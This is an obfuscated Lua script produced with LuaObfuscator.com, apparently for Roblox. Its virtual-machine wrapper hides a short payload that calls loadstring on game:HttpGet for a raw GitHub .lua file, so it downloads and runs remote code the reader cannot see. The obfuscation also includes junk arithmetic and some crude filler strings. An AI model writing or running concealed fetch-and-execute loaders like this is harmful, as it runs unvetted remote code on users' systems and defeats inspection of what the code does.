--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v92=v5(v84,v19);v19=nil;return v92;else return v84;end end end);local function v20(v31,v32,v33) if v33 then local v85=(877 -(282 + 595)) -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((3 -(1638 -(1523 + 114)))^(v32-1)))%((4 -2)^(((v33-1) -(v32-(620 -(499 + 56 + 64)))) + (932 -(857 + (105 -31))))) ;return v86-(v86%(569 -(367 + 201))) ;end end else local v87=(929 -(214 + 713))^(v32-1) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(0 + (350 -(87 + 263)))) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;v35=4 -3 ;end if (v35==(1 -0)) then return (v37 * (373 -(32 + 85))) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -((1019 -(802 + 150)) + (303 -190))) );v18=v18 + 3 + 1 ;return (v41 * ((74718629 -33527810) -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((2052 -(87 + 968)) -(915 + (360 -278)))) then v43=v23();v44=v23();v42=4 -3 ;end if (v42==(8 -5)) then if (v47==0) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else local v99=(780 + 79) -(814 + 45) ;while true do if (v99==(1187 -(1069 + 118))) then v47=2 -1 ;v45=(0 -0) + 0 ;break;end end end elseif (v47==(4477 -2430)) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(2446 -(630 + 793)) ) * (v45 + (v46/((6 -4)^(843 -((1781 -(447 + 966)) + 423))))) ;end if (v42==(6 -4)) then v47=v20(v44,(106 -67) -((1827 -(1703 + 114)) + 8) ,119 -88 );v48=((v20(v44,474 -(416 + 26) )==(3 -2)) and  -(1 + 0)) or (767 -(745 + 21)) ;v42=4 -1 ;end if (v42==(439 -(145 + 293))) then v45=431 -(44 + 386) ;v46=(v20(v44,1487 -(998 + 488) ,20) * ((1 + 1)^(27 + 5))) + v43 ;v42=774 -(201 + 571) ;end end end local function v25(v49) local v50;if  not v49 then local v88=701 -(376 + 325) ;while true do if (v88==((0 -0) -0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0 + 0 ;end)();while true do if (v68==(0 -0)) then if (v52~=(8 -5)) then else for v100= #".",v23() do local v101=(function() return v21();end)();if (v20(v101, #"]", #"|")~=(0 + 0)) then else local v112=(function() return 560 -(306 + 254) ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();while true do if (v112==(1 + 1)) then while true do if (v113== #".") then local v169=(function() return 0 -0 ;end)();while true do if ((1467 -(899 + 568))==v169) then v116=(function() return {v22(),v22(),nil,nil};end)();if (v114==0) then local v183=(function() return 0 + 0 ;end)();local v184=(function() return;end)();while true do if (v183==0) then v184=(function() return 0 -0 ;end)();while true do if (v184~=(603 -(268 + 335))) then else v116[ #"gha"]=(function() return v22();end)();v116[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v114== #"|") then v116[ #"xxx"]=(function() return v23();end)();elseif (v114==(292 -(60 + 230))) then v116[ #"gha"]=(function() return v23() -(2^(588 -(426 + 146))) ;end)();elseif (v114== #"gha") then local v193=(function() return 0;end)();while true do if (v193~=0) then else v116[ #"nil"]=(function() return v23() -((1 + 1)^16) ;end)();v116[ #"asd1"]=(function() return v22();end)();break;end end end v169=(function() return 1;end)();end if (v169~=(1 -0)) then else v113=(function() return 1458 -(282 + 1174) ;end)();break;end end end if (v113==(65 -(30 + 35))) then local v170=(function() return 811 -(569 + 242) ;end)();local v171=(function() return;end)();while true do if ((0 -0)==v170) then v171=(function() return 0 + 0 ;end)();while true do if (v171==(1257 -(1043 + 214))) then v114=(function() return v20(v101,7 -5 , #"nil");end)();v115=(function() return v20(v101, #"0313",1030 -(706 + 318) );end)();v171=(function() return 1252 -(721 + 530) ;end)();end if (v171==(1213 -(323 + 889))) then v113=(function() return  #"|";end)();break;end end break;end end end if (v113== #"91(") then if (v20(v115, #"91(", #"19(")~= #"|") then else v116[ #"?id="]=(function() return v59[v116[ #"xnxx"]];end)();end v54[v100]=(function() return v116;end)();break;end if (v113==2) then local v173=(function() return 0 -0 ;end)();local v174=(function() return;end)();while true do if (v173~=0) then else v174=(function() return 580 -(361 + 219) ;end)();while true do if ((1272 -(945 + 326))==v174) then v113=(function() return  #"-19";end)();break;end if (v174~=(0 + 0)) then else if (v20(v115, #"}", #"]")== #"[") then v116[4 -2 ]=(function() return v59[v116[2]];end)();end if (v20(v115,984 -(18 + 964) ,2 + 0 )== #"/") then v116[ #"asd"]=(function() return v59[v116[ #"19("]];end)();end v174=(function() return 701 -(271 + 429) ;end)();end end break;end end end end break;end if (v112~=0) then else local v147=(function() return 0 + 0 ;end)();local v148=(function() return;end)();while true do if (v147==(1500 -(1408 + 92))) then v148=(function() return 1086 -(461 + 625) ;end)();while true do if (v148~=1) then else v112=(function() return 1;end)();break;end if (v148~=0) then else v113=(function() return 0 + 0 ;end)();v114=(function() return nil;end)();v148=(function() return 1289 -(993 + 295) ;end)();end end break;end end end if (v112~=1) then else local v149=(function() return 850 -(20 + 830) ;end)();while true do if (1==v149) then v112=(function() return 2 + 0 ;end)();break;end if (v149==0) then v115=(function() return nil;end)();v116=(function() return nil;end)();v149=(function() return 1;end)();end end end end end end for v102= #":",v23() do v55,v102,v28=(function() return v53(v55,v102,v28);end)();end return v57;end if (v52==(1 + 0)) then local v97=(function() return 1171 -(418 + 753) ;end)();while true do if (v97~=(0 + 0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v97=(function() return 1;end)();end if (v97==1) then v58=(function() return v23();end)();v52=(function() return 1 + 1 ;end)();break;end end end v68=(function() return 1;end)();end if ((1 + 0)~=v68) then else if (v52==2) then local v98=(function() return 0 + 0 ;end)();while true do if (v98==(1 + 0)) then v57[ #"91("]=(function() return v21();end)();v52=(function() return 532 -(406 + 123) ;end)();break;end if (v98==(0 + 0)) then v59=(function() return {};end)();for v118= #".",v58 do local v119=(function() return 1769 -(1749 + 20) ;end)();local v120=(function() return;end)();local v121=(function() return;end)();local v122=(function() return;end)();while true do if (v119==1) then v122=(function() return nil;end)();while true do if (1==v120) then if (v121== #"!") then v122=(function() return v21()~=(0 -0) ;end)();elseif (v121==(1553 -(1126 + 425))) then v122=(function() return v24();end)();elseif (v121~= #"nil") then else v122=(function() return v25();end)();end v59[v118]=(function() return v122;end)();break;end if (v120~=0) then else local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 1322 -(1249 + 73) ;end)();while true do if ((1121 -(118 + 1003))~=v177) then else v121=(function() return v21();end)();v122=(function() return nil;end)();v177=(function() return 2 -1 ;end)();end if ((1 + 0)==v177) then v120=(function() return 1146 -(466 + 679) ;end)();break;end end break;end end end end break;end if (v119~=(0 -0)) then else local v150=(function() return 0 -0 ;end)();while true do if (v150==0) then v120=(function() return 0 -0 ;end)();v121=(function() return nil;end)();v150=(function() return 1;end)();end if (v150~=1) then else v119=(function() return 1901 -(106 + 1794) ;end)();break;end end end end end v98=(function() return 1 + 0 ;end)();end end end if ((977 -(553 + 424))==v52) then v53=(function() return function(v103,v104,v105) local v106=(function() return 0 + 0 ;end)();local v107=(function() return;end)();while true do if (v106==(0 -0)) then v107=(function() return 0 + 0 ;end)();while true do if (v107~=(0 -0)) then else local v163=(function() return 0 -0 ;end)();local v164=(function() return;end)();while true do if (v163==(0 + 0)) then v164=(function() return 114 -(4 + 110) ;end)();while true do if (v164==0) then local v185=(function() return 584 -(57 + 527) ;end)();while true do if (v185==(1427 -(41 + 1386))) then v103[v104-#"." ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v52=(function() return 104 -(17 + 86) ;end)();end break;end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[2 + 0 ];local v65=v60[6 -3 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=2 -1 ;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v89=0,v77 do if ((v89>=v71) or (569>=1591)) then v75[v89-v71 ]=v76[v89 + (4 -(3 + 0)) ];else v79[v89]=v76[v89 + (754 -((550 -311) + 514)) ];end end local v80=(v77-v71) + 1 + 0 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=(1335 -(797 + (1099 -567)))) then if (v82<=2) then if (v82<=(0 + 0)) then v79[v81[2]]=v62[v81[3]];elseif ((v82>(1 + 0)) or (4490<=89)) then v79[v81[2]]();else local v123=v81[4 -2 ];v79[v123]=v79[v123](v13(v79,v123 + (1203 -(373 + 829)) ,v74));end elseif (v82<=((287 + 448) -(476 + 255))) then if (v82==(1133 -(369 + 761))) then local v125=(1205 -(902 + 303)) + 0 ;local v126;local v127;while true do if (((1 -0)==v125) or (4983<1808)) then v79[v126 + (1 -0) ]=v127;v79[v126]=v127[v81[7 -3 ]];break;end if ((3829>3769) and (v125==((637 -399) -(64 + 174)))) then v126=v81[2];v127=v79[v81[1 + 2 ]];v125=1228 -(322 + 905) ;end end else local v128=0;local v129;local v130;while true do if (v128==(1 -0)) then v79[v129 + (337 -(144 + 192)) ]=v130;v79[v129]=v130[v81[4]];break;end if ((1485<=2904) and (v128==0)) then v129=v81[3 -1 ];v130=v79[v81[219 -(42 + 174) ]];v128=(2 -1) + 0 ;end end end elseif (v82>(5 + 0 + 0)) then local v131=0 + (611 -(602 + 9)) ;local v132;local v133;local v134;local v135;while true do if (v131==(1506 -(363 + 1141))) then for v165=v132,v74 do local v166=1580 -(1183 + 397) ;while true do if (0==v166) then v135=v135 + (2 -1) ;v79[v165]=v133[v135];break;end end end break;end if ((4269==4269) and (v131==(1 + 0))) then v74=(v134 + v132) -((1691 -(1121 + 569)) + 0) ;v135=(3164 -(449 + 740)) -(1913 + 62) ;v131=2 + 0 ;end if (v131==(0 -(214 -(22 + 192)))) then v132=v81[1935 -(565 + 1368) ];v133,v134=v72(v79[v132](v13(v79,v132 + (3 -2) ,v81[1664 -(1477 + 184) ])));v131=1 -0 ;end end else v79[v81[2 + 0 ]]=v81[859 -(564 + 292) ];end elseif ((387<=2782) and (v82<=9)) then if (v82<=((883 -(826 + 46)) -4)) then local v110=v81[5 -(686 -(483 + 200)) ];v79[v110]=v79[v110](v13(v79,v110 + (305 -(244 + 60)) ,v74));elseif (v82>(7 + 1)) then do return;end else local v138=0;local v139;local v140;local v141;local v142;while true do if ((478 -((1504 -(1404 + 59)) + 435))==v138) then for v167=v139,v74 do local v168=1001 -(938 + (172 -109)) ;while true do if (v168==((0 -0) + 0)) then v142=v142 + (1126 -((1701 -(468 + 297)) + (751 -(334 + 228)))) ;v79[v167]=v140[v142];break;end end end break;end if (v138==(1 + 0)) then v74=(v141 + v139) -(1614 -(1565 + 48)) ;v142=0 + 0 ;v138=(2087 -(245 + 702)) -(782 + 356) ;end if ((v138==(267 -(176 + 91))) or (1899<=917)) then v139=v81[4 -2 ];v140,v141=v72(v79[v139](v13(v79,v139 + (1 -0) ,v81[1095 -(975 + 117) ])));v138=(5927 -4051) -(157 + 553 + 1165) ;end end end elseif ((v82<=(9 + (1900 -(260 + 1638)))) or (4312<=876)) then if (v82>(33 -23)) then v79[v81[2]]=v81[10 -(447 -(382 + 58)) ];else v79[v81[2]]=v62[v81[10 -7 ]];end elseif (v82==(1030 -((1614 -917) + (581 -260)))) then v79[v81[5 -3 ]]();else do return;end end v73=v73 + (1 -(0 -0)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F536372697074732F726566732F68656164732F6D61696E2F393237396534653038373833303639342Q33313431612Q342E6C756100083Q00120A3Q00013Q00120A000100023Q002003000100010003001205000300044Q0006000100034Q00015Q00022Q000C3Q000100012Q00093Q00017Q00",v9(),...);
